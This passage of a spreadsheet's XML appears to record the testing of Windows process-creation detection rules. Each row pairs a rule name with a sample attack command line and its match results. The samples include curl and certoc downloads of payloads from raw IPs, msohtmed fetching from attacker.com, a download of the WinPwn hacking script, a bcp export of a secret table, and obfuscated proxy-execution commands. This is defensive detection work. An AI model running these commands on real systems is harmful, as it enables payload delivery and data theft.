    </row>
    <row r="3518" ht="15.75" customHeight="1" s="42">
      <c r="A3518" s="43" t="n"/>
      <c r="B3518" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_direct_ip_susp_extensions</t>
        </is>
      </c>
      <c r="C3518" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From IP Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3518" s="43" t="inlineStr">
        <is>
          <t>5cb299fc-5fb1-4d07-b989-0644c68b6043</t>
        </is>
      </c>
      <c r="E3518" s="43" t="inlineStr">
        <is>
          <t>curl  --output benign.hta "https://12.34.56.78/hack/evil.hta "</t>
        </is>
      </c>
      <c r="F3518" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3518" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3518" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3518" s="43" t="inlineStr">
        <is>
          <t>File Download From IP URL Via Curl.EXE (9cc85849-3b02-4cb5-b371-3a1ff54f2218); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3518" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3518" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3519" ht="15.75" customHeight="1" s="42">
      <c r="A3519" s="43" t="n"/>
      <c r="B3519" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C3519" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From File Sharing Domain Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3519" s="43" t="inlineStr">
        <is>
          <t>56454143-524f-49fb-b1c6-3fb8b1ad41fb</t>
        </is>
      </c>
      <c r="E3519" s="43" t="inlineStr">
        <is>
          <t>curl  -o WinPwn.ps1 "https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1"</t>
        </is>
      </c>
      <c r="F3519" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3519" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3519" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3519" s="4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J3519" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3519" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3520" ht="15.75" customHeight="1" s="42">
      <c r="A3520" s="43" t="n"/>
      <c r="B3520" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C3520" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From File Sharing Domain Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3520" s="43" t="inlineStr">
        <is>
          <t>56454143-524f-49fb-b1c6-3fb8b1ad41fb</t>
        </is>
      </c>
      <c r="E3520" s="43" t="inlineStr">
        <is>
          <t>curl  -O "https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1 "</t>
        </is>
      </c>
      <c r="F3520" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3520" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3520" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3520" s="4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J3520" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3520" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3521" ht="15.75" customHeight="1" s="42">
      <c r="A3521" s="43" t="n"/>
      <c r="B3521" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_download_susp_file_sharing_domains</t>
        </is>
      </c>
      <c r="C3521" s="43" t="inlineStr">
        <is>
          <t>Suspicious File Download From File Sharing Domain Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3521" s="43" t="inlineStr">
        <is>
          <t>56454143-524f-49fb-b1c6-3fb8b1ad41fb</t>
        </is>
      </c>
      <c r="E3521" s="43" t="inlineStr">
        <is>
          <t>curl  "-O" "https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1"</t>
        </is>
      </c>
      <c r="F3521" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3521" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3521" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3521" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); HackTool - WinPwn Execution (d557dc06-62e8-4468-a8e8-7984124908ce); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3521" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3521" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3522" ht="15.75" customHeight="1" s="42">
      <c r="A3522" s="43" t="n"/>
      <c r="B3522" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_insecure_connection</t>
        </is>
      </c>
      <c r="C3522" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3522" s="43" t="inlineStr">
        <is>
          <t>cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec</t>
        </is>
      </c>
      <c r="E3522" s="43" t="inlineStr">
        <is>
          <t>curl "--insecure" http://example.com</t>
        </is>
      </c>
      <c r="F3522" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3522" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3522" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE (cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3522" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3522" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3523" ht="15.75" customHeight="1" s="42">
      <c r="A3523" s="43" t="n"/>
      <c r="B3523" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_insecure_connection</t>
        </is>
      </c>
      <c r="C3523" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3523" s="43" t="inlineStr">
        <is>
          <t>cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec</t>
        </is>
      </c>
      <c r="E3523" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -k^  http://example.com</t>
        </is>
      </c>
      <c r="F3523" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3523" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3523" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE (cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec);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523" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3523" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3524" ht="15.75" customHeight="1" s="42">
      <c r="A3524" s="43" t="n"/>
      <c r="B3524" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_insecure_connection</t>
        </is>
      </c>
      <c r="C3524" s="43" t="inlineStr">
        <is>
          <t>Insecure Transfer Via Curl.EXE</t>
        </is>
      </c>
      <c r="D3524" s="43" t="inlineStr">
        <is>
          <t>cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec</t>
        </is>
      </c>
      <c r="E3524" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; Invoke-WebRequest -Uri 'http://example.com'"</t>
        </is>
      </c>
      <c r="F3524" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3524" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3524" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3524" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3524" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3524" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3525" ht="15.75" customHeight="1" s="42">
      <c r="A3525" s="43" t="n"/>
      <c r="B3525" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3525" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3525" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3525" s="43" t="inlineStr">
        <is>
          <t>curl "file:/"//C:\Users\xodih\AppData\Local\Temp\calc.dll</t>
        </is>
      </c>
      <c r="F3525" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3525" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3525" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3525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3525" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3525" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3526" ht="15.75" customHeight="1" s="42">
      <c r="A3526" s="43" t="n"/>
      <c r="B3526" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3526" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3526" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3526" s="43" t="inlineStr">
        <is>
          <t>curl file://localhost/C:\Users\xodih\AppData\Local\Temp\calc.dll</t>
        </is>
      </c>
      <c r="F3526" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3526" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3526" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3526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3526" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3526" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3527" ht="15.75" customHeight="1" s="42">
      <c r="A3527" s="43" t="n"/>
      <c r="B3527" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_curl_local_file_read</t>
        </is>
      </c>
      <c r="C3527" s="43" t="inlineStr">
        <is>
          <t>Local File Read Using Curl.EXE</t>
        </is>
      </c>
      <c r="D3527" s="43" t="inlineStr">
        <is>
          <t>aa6f6ea6-0676-40dd-b510-6e46f02d8867</t>
        </is>
      </c>
      <c r="E3527" s="43" t="inlineStr">
        <is>
          <t>curl file://C:\Users\xodih\AppData\Local\Temp\calc.dll</t>
        </is>
      </c>
      <c r="F3527" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3527" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3527" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3527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3527" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K3527" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3528" ht="15.75" customHeight="1" s="42">
      <c r="A3528" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B3528" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpup</t>
        </is>
      </c>
      <c r="C3528" s="43" t="inlineStr">
        <is>
          <t>HackTool - SharpUp PrivEsc Tool Execution</t>
        </is>
      </c>
      <c r="D3528" s="43" t="inlineStr">
        <is>
          <t>c484e533-ee16-4a93-b6ac-f0ea4868b2f1</t>
        </is>
      </c>
      <c r="E3528" s="43" t="n"/>
      <c r="F3528" s="43" t="n"/>
      <c r="G3528" s="43" t="n"/>
      <c r="H3528" s="43" t="n"/>
      <c r="I3528" s="43" t="n"/>
      <c r="J3528" s="43" t="n"/>
      <c r="K3528" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3529" ht="15.75" customHeight="1" s="42">
      <c r="A3529" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3529" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C3529" s="43" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D3529" s="43" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E3529" s="43" t="inlineStr">
        <is>
          <t>dotnet-trace collect -- calc.exe</t>
        </is>
      </c>
      <c r="F3529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3529" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3529" s="43" t="n"/>
      <c r="J3529" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3529" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3530" ht="15.75" customHeight="1" s="42">
      <c r="A3530" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3530" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C3530" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D3530" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E3530" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe -n1 calc.exe</t>
        </is>
      </c>
      <c r="F3530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3530" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3530" s="43" t="n"/>
      <c r="J3530" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3530" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3531" ht="15.75" customHeight="1" s="42">
      <c r="A3531" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3531" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3531" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3531" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3531" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe "h"tt"p"://attacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F3531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3531" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3531" s="43" t="n"/>
      <c r="J3531" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3531" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3532" ht="15.75" customHeight="1" s="42">
      <c r="A3532" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3532" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C3532" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D3532" s="43" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E3532" s="43" t="inlineStr">
        <is>
          <t>msohtmed.exe payload.exe</t>
        </is>
      </c>
      <c r="F3532" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3532" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3532" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3532" s="43" t="n"/>
      <c r="J3532" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3532" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3533" ht="15.75" customHeight="1" s="42">
      <c r="A3533" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B3533" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C3533" s="43" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D3533" s="43" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E3533" s="43" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -S MYSERVER -d MyDB</t>
        </is>
      </c>
      <c r="F3533" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3533" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3533" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3533" s="43" t="n"/>
      <c r="J3533" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3533" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3534" ht="15.75" customHeight="1" s="42">
      <c r="A3534" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B3534" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C3534" s="43" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D3534" s="43" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E3534" s="43" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -d MyDB -S MYSERVER</t>
        </is>
      </c>
      <c r="F3534" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3534" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3534" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3534" s="43" t="n"/>
      <c r="J3534" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3534" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3535" ht="15.75" customHeight="1" s="42">
      <c r="A3535" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B3535" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_bcp_export_data</t>
        </is>
      </c>
      <c r="C3535" s="43" t="inlineStr">
        <is>
          <t>Data Export From MSSQL Table Via BCP.EXE</t>
        </is>
      </c>
      <c r="D3535" s="43" t="inlineStr">
        <is>
          <t>c615d676-f655-46b9-b913-78729021e5d7</t>
        </is>
      </c>
      <c r="E3535" s="43" t="inlineStr">
        <is>
          <t>bcp "SELECT * FROM dbo.SecretTable" queryout C:\temp\export.txt -c -T -S"MYSERVER" -d"MyDB"</t>
        </is>
      </c>
      <c r="F3535" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3535" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3535" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3535" s="43" t="n"/>
      <c r="J3535" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3535" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3536" ht="15.75" customHeight="1" s="42">
      <c r="A3536" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3536" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C3536" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3536" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E3536" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -GetCACAPS http://192.168.1.100/payload.ext</t>
        </is>
      </c>
      <c r="F3536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3536" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3536" s="43" t="n"/>
      <c r="J3536" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3536" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3537" ht="15.75" customHeight="1" s="42">
      <c r="A3537" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3537" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C3537" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3537" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E3537" s="43" t="inlineStr">
        <is>
          <t>certoc.exe /GetCACAPS http://192.168.1.100/payload.ext</t>
        </is>
      </c>
      <c r="F3537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3537" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3537" s="43" t="n"/>
      <c r="J3537" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3537" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3538" ht="15.75" customHeight="1" s="42">
      <c r="A3538" s="43" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B3538" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_download_direct_ip</t>
        </is>
      </c>
      <c r="C3538" s="43" t="inlineStr">
        <is>
          <t>File Download From IP Based URL Via CertOC.EXE</t>
        </is>
      </c>
      <c r="D3538" s="43" t="inlineStr">
        <is>
          <t>b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a</t>
        </is>
      </c>
      <c r="E3538" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -GetCACAPS "http://192.168.1.100/payload.ext"</t>
        </is>
      </c>
      <c r="F3538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3538" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3538" s="43" t="n"/>
      <c r="J3538" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3538" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3539" ht="15.75" customHeight="1" s="42">
      <c r="A3539" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B3539" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_shell32_susp_execution</t>
        </is>
      </c>
      <c r="C3539" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory</t>
        </is>
      </c>
      <c r="D3539" s="43" t="inlineStr">
        <is>
          <t>32b96012-7892-429e-b26c-ac2bf46066ff</t>
        </is>
      </c>
      <c r="E3539" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,Control_RunDLL payload.dll</t>
        </is>
      </c>
      <c r="F3539" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3539" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3539" s="43" t="n"/>
      <c r="J3539" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3539" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3540" ht="15.75" customHeight="1" s="42">
      <c r="A3540" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3540" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_dosfuscation</t>
        </is>
      </c>
      <c r="C3540" s="43" t="inlineStr">
        <is>
          <t>Potential Dosfuscation Activity</t>
        </is>
      </c>
      <c r="D3540" s="43" t="inlineStr">
        <is>
          <t>a77c1610-fc73-4019-8e29-0f51efc04a51</t>
        </is>
      </c>
      <c r="E3540" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "s"e"t OBJ=calc.exe &amp;&amp; %O%B%J%"</t>
        </is>
      </c>
      <c r="F3540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3540" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3540" s="43" t="n"/>
      <c r="J3540" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3540" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3541" ht="15.75" customHeight="1" s="42">
      <c r="A3541" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3541" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C3541" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D3541" s="43" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E3541" s="43" t="inlineStr">
        <is>
          <t>forfiles /p c:\windows\system32 /m notepad.exe /c"calc.exe"</t>
        </is>
      </c>
      <c r="F3541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3541" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3541" s="43" t="n"/>
      <c r="J3541" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3541" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3542" ht="15.75" customHeight="1" s="42">
      <c r="A3542" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3542" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_forfiles_proxy_execution_</t>
        </is>
      </c>
      <c r="C3542" s="43" t="inlineStr">
        <is>
          <t>Forfiles Command Execution</t>
        </is>
      </c>
      <c r="D3542" s="43" t="inlineStr">
        <is>
          <t>9aa5106d-bce3-4b13-86df-3a20f1d5cf0b</t>
        </is>
      </c>
      <c r="E3542" s="43" t="inlineStr">
        <is>
          <t>forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</t>
        </is>
      </c>
      <c r="F3542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3542" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3542" s="43" t="n"/>
      <c r="J3542" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3542" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3543" ht="15.75" customHeight="1" s="42">
      <c r="A3543" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3543" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C3543" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D3543" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E3543" s="43" t="inlineStr">
        <is>
          <t>fsutil behavior set SymlinkEvaluation R2L:1</t>
        </is>
      </c>
      <c r="F3543" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3543" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3543" s="43" t="n"/>
      <c r="J3543" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3543" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3544" ht="15.75" customHeight="1" s="42">
      <c r="A3544" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
      </c>
      <c r="B3544" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_fsutil_symlinkevaluation</t>
        </is>
      </c>
      <c r="C3544" s="43" t="inlineStr">
        <is>
          <t>Fsutil Behavior Set SymlinkEvaluation</t>
        </is>
      </c>
      <c r="D3544" s="43" t="inlineStr">
        <is>
          <t>c0b2768a-dd06-4671-8339-b16ca8d1f27f</t>
        </is>
      </c>
      <c r="E3544" s="43" t="inlineStr">
        <is>
          <t>fsutil behavior set SymlinkEvaluation R2R:1</t>
        </is>
      </c>
      <c r="F3544" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3544" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3544" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3544" s="43" t="n"/>
      <c r="J3544" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3544" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3545" ht="15.75" customHeight="1" s="42">
      <c r="A3545" s="43" t="inlineStr">
        <is>
          <t>t1059</t>
        </is>
